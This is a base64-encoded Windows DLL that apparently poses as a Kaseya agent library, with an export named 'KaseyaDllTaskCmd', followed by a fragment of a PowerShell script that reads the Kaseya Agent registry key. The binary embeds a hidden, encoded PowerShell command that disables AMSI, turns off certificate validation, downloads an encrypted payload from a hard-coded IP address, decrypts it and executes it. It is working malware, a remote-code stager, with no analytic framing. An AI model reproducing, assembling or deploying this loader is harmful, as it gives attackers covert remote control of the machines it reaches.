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 \
lcHFcYpCQ/yVscVxikJD/JWhxXGKQkP8lZHFcYpCQ/yVgcVxikJD/JVxxXGKQkP8lWHFcYpCQ/yVUcVxikJD/JUxxXGKQkP8 \
lRHFcYpCQ/yVAcVxikJD/JTxxXGKQkGaQZpBmkGaQVYnlXemn7///kJCQkJCQkP////+QJFxiAAAAAP////8AAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwJFxi//////////8CAAAATuZAu7EZv0QAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGxpYmdjai0xNi5kbGwAX0p2X1JlZ2lzdGV \
yQ2xhc3NlcwAAAHdpbiEAAAAAImM6XFdpbmRvd3NcU3lzdGVtMzJcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxwb3dlcnNoZWx \
sLmV4ZSIgLW5vcCAtdyBoaWRkZW4gLXN0YSAtdyAxIC1lbmMgIFd3QlNBR1VBWmdCZEFDNEFRUUJUQUhNQVpRQk5BRUlBVEF \
CWkFDNEFSd0JGQUhRQVZBQjVBRkFBWlFBb0FDY0FVd0I1QUhNQWRBQmxBRzBBTGdCTkFHRUFiZ0JoQUdjQVpRQnRBR1VBYmd \
CMEFDNEFRUUIxQUhRQWJ3QnRBR0VBZEFCcEFHOEFiZ0F1QUVFQWJRQnpBR2tBVlFCMEFHa0FiQUJ6QUNjQUtRQjhBRDhBZXd \
Ba0FGOEFmUUI4QUNVQWV3QWtBRjhBTGdCSEFFVUFWQUJHQUdrQVpRQnNBR1FBS0FBbkFHRUFiUUJ6QUdrQVNRQnVBR2tBZEF \
CR0FHRUFhUUJzQUdVQVpBQW5BQ3dBSndCT0FHOEFiZ0JRQUhVQVlnQnNBR2tBWXdBc0FGTUFkQUJoQUhRQWFRQmpBQ2NBS1F \
BdUFGTUFaUUJVQUZZQVFRQnNBSFVBWlFBb0FDUUFUZ0IxQUV3QVRBQXNBQ1FBVkFCU0FIVUFSUUFwQUgwQU93QmJBRk1BV1F \
CekFGUUFSUUJOQUM0QVRnQkZBSFFBTGdCVEFFVUFjZ0JXQUVrQVl3QkZBRkFBYndCcEFHNEFkQUJOQUdFQWJnQkJBR2NBWlF \
CU0FGMEFPZ0E2QUVVQVdBQlFBR1VBUXdCVUFERUFNQUF3QUVNQVR3Qk9BSFFBU1FCdUFGVUFSUUE5QURBQU93QWtBRmNBWXd \
BOUFFNEFSUUIzQUMwQVR3QmlBRW9BWlFCREFGUUFJQUJUQUZrQVV3QlVBRVVBYlFBdUFFNEFaUUJVQUM0QVZ3QkZBR0lBUXd \
Cc0FHa0FaUUJ1QUZRQU93QWtBSFVBUFFBbkFFMEFid0I2QUdrQWJBQnNBR0VBTHdBMUFDNEFNQUFnQUNnQVZ3QnBBRzRBWkF \
CdkFIY0Fjd0FnQUU0QVZBQWdBRFlBTGdBeEFEc0FJQUJYQUU4QVZ3QTJBRFFBT3dBZ0FGUUFjZ0JwQUdRQVpRQnVBSFFBTHd \
BM0FDNEFNQUE3QUNBQWNnQjJBRG9BTVFBeEFDNEFNQUFwQUNBQWJBQnBBR3NBWlFBZ0FFY0FaUUJqQUdzQWJ3QW5BRHNBV3d \
CVEFIa0Fjd0IwQUdVQWJRQXVBRTRBWlFCMEFDNEFVd0JsQUhJQWRnQnBBR01BWlFCUUFHOEFhUUJ1QUhRQVRRQmhBRzRBWVF \
CbkFHVUFjZ0JkQURvQU9nQlRBR1VBY2dCMkFHVUFjZ0JEQUdVQWNnQjBBR2tBWmdCcEFHTUFZUUIwQUdVQVZnQmhBR3dBYVF \
Ca0FHRUFkQUJwQUc4QWJnQkRBR0VBYkFCc0FHSUFZUUJqQUdzQUlBQTlBQ0FBZXdBa0FIUUFjZ0IxQUdVQWZRQTdBQ1FBVnd \
CakFDNEFTQUJsQUdFQVJBQkZBRklBVXdBdUFFRUFaQUJFQUNnQUp3QlZBSE1BWlFCeUFDMEFRUUJuQUdVQWJnQjBBQ2NBTEF \
Ba0FIVUFLUUE3QUNRQVZ3QkRBQzRBVUFCU0FHOEFlQUJaQUQwQVd3QlRBSGtBY3dCMEFHVUFiUUF1QUU0QVJRQjBBQzRBVnd \
CbEFHSUFVZ0JsQUZFQVZRQmxBRk1BZEFCZEFEb0FPZ0JFQUVVQVpnQmhBRlVBVEFCVUFGY0FSUUJpQUZBQWNnQnZBSGdBV1F \
BN0FDUUFkd0JEQUM0QVVBQlNBRzhBV0FCNUFDNEFRd0J5QUVVQVJBQkZBRzRBVkFCcEFFRUFUQUJ6QUNBQVBRQWdBRnNBVXd \
CNUFITUFkQUJsQUUwQUxnQk9BR1VBZEFBdUFFTUFjZ0JGQUVRQVpRQnVBSFFBU1FCQkFFd0FRd0JCQUdNQWFBQmxBRjBBT2d \
BNkFFUUFaUUJtQUVFQVZRQk1BRlFBVGdCRkFGUUFkd0JQQUZJQVN3QkRBSElBUlFCRUFFVUFiZ0IwQUdrQVFRQk1BRk1BT3d \
Ba0FFc0FQUUJiQUZNQWVRQlRBSFFBUlFCdEFDNEFWQUJGQUZnQVZBQXVBRVVBYmdCREFHOEFSQUJwQUU0QVp3QmRBRG9BT2d \
CQkFGTUFRd0JKQUVrQUxnQkhBR1VBZEFCQ0FGa0FWQUJsQUhNQUtBQW5BREFBTUFCbEFEVUFNUUJoQURjQVl3QmlBR0VBWXd \
CbUFEZ0FZUUEwQURBQU1RQmhBR1lBWkFCakFHUUFPUUExQURVQU1RQTBBR1lBWVFCa0FEa0FaUUFuQUNrQU93QWtBRklBUFF \
CN0FDUUFSQUFzQUNRQVN3QTlBQ1FBUVFCU0FFY0FVd0E3QUNRQVV3QTlBREFBTGdBdUFESUFOUUExQURzQU1BQXVBQzRBTWd \
BMUFEVUFmQUFsQUhzQUpBQktBRDBBS0FBa0FFb0FLd0FrQUZNQVd3QWtBRjhBWFFBckFDUUFTd0JiQUNRQVh3QWxBQ1FBU3d \
BdUFFTUFid0IxQUc0QVZBQmRBQ2tBSlFBeUFEVUFOZ0E3QUNRQVV3QmJBQ1FBWHdCZEFDd0FKQUJUQUZzQUpBQktBRjBBUFF \
Ba0FGTUFXd0FrQUVvQVhRQXNBQ1FBVXdCYkFDUUFYd0JkQUgwQU93QWtBRVFBZkFBbEFIc0FKQUJKQUQwQUtBQWtBRWtBS3d \
BeEFDa0FKUUF5QURVQU5nQTdBQ1FBU0FBOUFDZ0FKQUJJQUNzQUpBQlRBRnNBSkFCSkFGMEFLUUFsQURJQU5RQTJBRHNBSkF \
CVEFGc0FKQUJKQUYwQUxBQWtBRk1BV3dBa0FFZ0FYUUE5QUNRQVV3QmJBQ1FBU0FCZEFDd0FKQUJUQUZzQUpBQkpBRjBBT3d \
Ba0FGOEFMUUJDQUZnQWJ3QlNBQ1FBVXdCYkFDZ0FKQUJUQUZzQUpBQkpBRjBBS3dBa0FGTUFXd0FrQUVnQVhRQXBBQ1VBTWd \
BMUFEWUFYUUI5QUgwQU93QWtBSGNBUXdBdUFFZ0FSUUJCQUdRQVJRQnlBSE1BTGdCQkFHUUFaQUFvQUNJQVF3QnZBRzhBYXd \
CcEFHVUFJZ0FzQUNJQWN3QmxBSE1BY3dCcEFHOEFiZ0E5QUdjQWRBQkhBRTBBVkFCSUFFZ0FUd0JyQUNzQU53QmhBRlFBWXd \
CaEFHTUFkUUJvQUdNQVp3QkhBR2dBWndCSUFHc0FTQUJKQUQwQUlnQXBBRHNBSkFCekFHVUFjZ0E5QUNjQWFBQjBBSFFBY0F \
CekFEb0FMd0F2QURFQU1BQTBBQzRBTWdBekFEWUFMZ0F4QURrQU5nQXVBRFVBTmdBNkFEUUFOQUF6QUNjQU93QWtBSFFBUFF \
BbkFDOEFiQUJ2QUdjQWFRQnVBQzhBY0FCeUFHOEFZd0JsQUhNQWN3QXVBSEFBYUFCd0FDY0FPd0FrQUVRQVFRQlVBR0VBUFF \
Ba0FGY0FRd0F1QUVRQWJ3QjNBRTRBVEFCUEFHRUFSQUJFQUVFQVZBQkJBQ2dBSkFCVEFHVUFVZ0FyQUNRQVZBQXBBRHNBSkF \
CSkFIWUFQUUFrQUdRQVFRQjBBRUVBV3dBd0FDNEFMZ0F6QUYwQU93QWtBR1FBUVFCVUFFRUFQUUFrQUdRQVFRQlVBR0VBV3d \
BMEFDNEFMZ0FrQUVRQVFRQjBBR0VBTGdCc0FFVUFiZ0JIQUZRQWFBQmRBRHNBTFFCS0FFOEFhUUJ1QUZzQVF3Qm9BR0VBY2d \
CYkFGMEFYUUFvQUNZQUlBQWtBRklBSUFBa0FHUUFZUUJVQUdFQUlBQW9BQ1FBU1FCV0FDc0FKQUJMQUNrQUtRQjhBRWtBUlF \
CWUFBPT0AAFNcYiBQXGKQGFxiTWluZ3ctdzY0IHJ1bnRpbWUgZmFpbHVyZToKAEFkZHJlc3MgJXAgaGFzIG5vIGltYWdlLXN \
lY3Rpb24AICBWaXJ0dWFsUXVlcnkgZmFpbGVkIGZvciAlZCBieXRlcyBhdCBhZGRyZXNzICVwAAAAACAgVmlydHVhbFByb3R \
lY3QgZmFpbGVkIHdpdGggY29kZSAweCV4AAAgIFVua25vd24gcHNldWRvIHJlbG9jYXRpb24gcHJvdG9jb2wgdmVyc2lvbiA \
lZC4KAAAAICBVbmtub3duIHBzZXVkbyByZWxvY2F0aW9uIGJpdCBzaXplICVkLgoAAABHQ0M6IChHTlUpIDYuMi4xIDIwMTY \
xMTE4AAAAR0NDOiAoR05VKSA2LjMuMCAyMDE3MDUxNgAAAEdDQzogKEdOVSkgNi4zLjAgMjAxNzA1MTYAAABHQ0M6IChHTlU \
pIDYuMi4xIDIwMTYxMTE4AAAAR0NDOiAoR05VKSA2LjIuMSAyMDE2MTExOAAAAEdDQzogKEdOVSkgNi4yLjEgMjAxNjExMTg \
AAABHQ0M6IChHTlUpIDYuMi4xIDIwMTYxMTE4AAAAR0NDOiAoR05VKSA2LjIuMSAyMDE2MTExOAAAAEdDQzogKEdOVSkgNi4 \
yLjEgMjAxNjExMTgAAABHQ0M6IChHTlUpIDYuMi4xIDIwMTYxMTE4AAAAR0NDOiAoR05VKSA2LjIuMSAyMDE2MTExOAAAAEd \
DQzogKEdOVSkgNi4yLjEgMjAxNjExMTgAAABHQ0M6IChHTlUpIDYuMi4xIDIwMTYxMTE4AAAAR0NDOiAoR05VKSA2LjIuMSA \
yMDE2MTExOAAAAEdDQzogKEdOVSkgNi4yLjEgMjAxNjExMTgAAABHQ0M6IChHTlUpIDYuMi4xIDIwMTYxMTE4AAAAR0NDOiA \
oR05VKSA2LjMuMCAyMDE3MDUxNgAAAEdDQzogKEdOVSkgNi4yLjEgMjAxNjExMTgAAABHQ0M6IChHTlUpIDYuMi4xIDIwMTY \
xMTE4AAAAR0NDOiAoR05VKSA2LjMuMCAyMDE3MDUxNgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAnld/WQAAAAAyYAAAAQAAAAEAAAABAAAAKGAAACx \
gAAAwYAAAsBQAADpgAAAAAGRsbC5kbGwAS2FzZXlhRGxsVGFza0NtZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADxwAAAAAAAAAAAAAFR0AADgcAAAmHAAAAA \
AAAAAAAAAqHQAADxxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIRxAACWcQAArnEAAMZxAADacQAA8HEAAAZyAAAWcgAAKnIAADx \
yAABWcgAAZnIAAIJyAACacgAAtHIAANJyAADacgAA7nIAAPxyAAAYcwAAKnMAADpzAAAAAAAAUHMAAF5zAABscwAAeHMAAIB \
zAACIcwAAknMAAJpzAACkcwAArnMAALhzAADAcwAAynMAANRzAADecwAA5nMAAPJzAAAAAAAAhHEAAJZxAACucQAAxnEAANp \
xAADwcQAABnIAABZyAAAqcgAAPHIAAFZyAABmcgAAgnIAAJpyAAC0cgAA0nIAANpyAADucgAA/HIAABhzAAAqcwAAOnMAAAA \
AAABQcwAAXnMAAGxzAAB4cwAAgHMAAIhzAACScwAAmnMAAKRzAACucwAAuHMAAMBzAADKcwAA1HMAAN5zAADmcwAA8nMAAAA \
AAACoAENyZWF0ZVByb2Nlc3NBAADVAERlbGV0ZUNyaXRpY2FsU2VjdGlvbgDxAEVudGVyQ3JpdGljYWxTZWN0aW9uAADGAUd \
ldEN1cnJlbnRQcm9jZXNzAMcBR2V0Q3VycmVudFByb2Nlc3NJZADLAUdldEN1cnJlbnRUaHJlYWRJZAAABQJHZXRMYXN0RXJ \
yb3IAABcCR2V0TW9kdWxlSGFuZGxlQQAARwJHZXRQcm9jQWRkcmVzcwAAfQJHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQCZAkd \
ldFRpY2tDb3VudAAA7QJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uACgDTGVhdmVDcml0aWNhbFNlY3Rpb24AAJgDUXVlcnl \
QZXJmb3JtYW5jZUNvdW50ZXIAbQRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAegRTbGVlcACIBFRlcm1pbmF0ZVByb2N \
lc3MAAI8EVGxzR2V0VmFsdWUAnARVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAALwEVmlydHVhbFByb3RlY3QAAL8EVmlydHV \
hbFF1ZXJ5AADIBFdhaXRGb3JTaW5nbGVPYmplY3QAMABfX2RsbG9uZXhpdAB9AF9hbXNnX2V4aXQAABgBX2luaXR0ZXJtABw \
BX2lvYgAAfQFfbG9jawAaAl9vbmV4aXQAwgNmcmVlAADLA2Z3cml0ZQAA9wNtYWxsb2MAAP8DbWVtc2V0AAAIBHB1dHMAACU \
Ec3RybGVuAAAnBHN0cm5jbXAApwJfdW5sb2NrAPoCYWJvcnQAcgR2ZnByaW50ZgAAowNjYWxsb2MAAABwAAAAcAAAAHAAAAB \
wAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAAB \
wAABLRVJORUwzMi5kbGwAAAAAFHAAABRwAAAUcAAAFHAAABRwAAAUcAAAFHAAABRwAAAUcAAAFHAAABRwAAAUcAAAFHAAABR \
wAAAUcAAAFHAAABRwAABtc3ZjcnQuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAQXGIAAAAAAAAAAJAYXGJAGFxiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAACQXGIckFxibFNcYhiAXGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAEAAAXAEAAB0wIjBPMGIwZzCHMJAw1zD6MAUxEzEgMTYxXDGBMZQxwjHMMdgx4jECMhQyGzIhMkg \
yTzJaMoEyiDLnMgU0RzRSNFg0bDR1NIU0jjS8NEQ1UDVoNYU1qzW8Nfc1DzYpNmE2czZ/NpY2pjayNsw24TbyNgg3Jjc7N0w \
3VDdcN2s3jjeUN7g3yDfZN9434zfrN/A3+DcBOAs4ETgaOCs4lzikOMQ4yThFOWA5fTmoObY59DklOjI6Vzp0OoE6ljqdOqs \
\$path_opt = "%s"
\$exec_opt = "%s"
if (\$path_opt.compareTo("work") -eq 0) {
if (\$exec_opt.compareTo("default") -eq 0) {
\$exec_opt = "NetUserStateAudit.exe"
}
\$uid = Get-ChildItem "hklm:\SOFTWARE\Kaseya\Agent" -Name
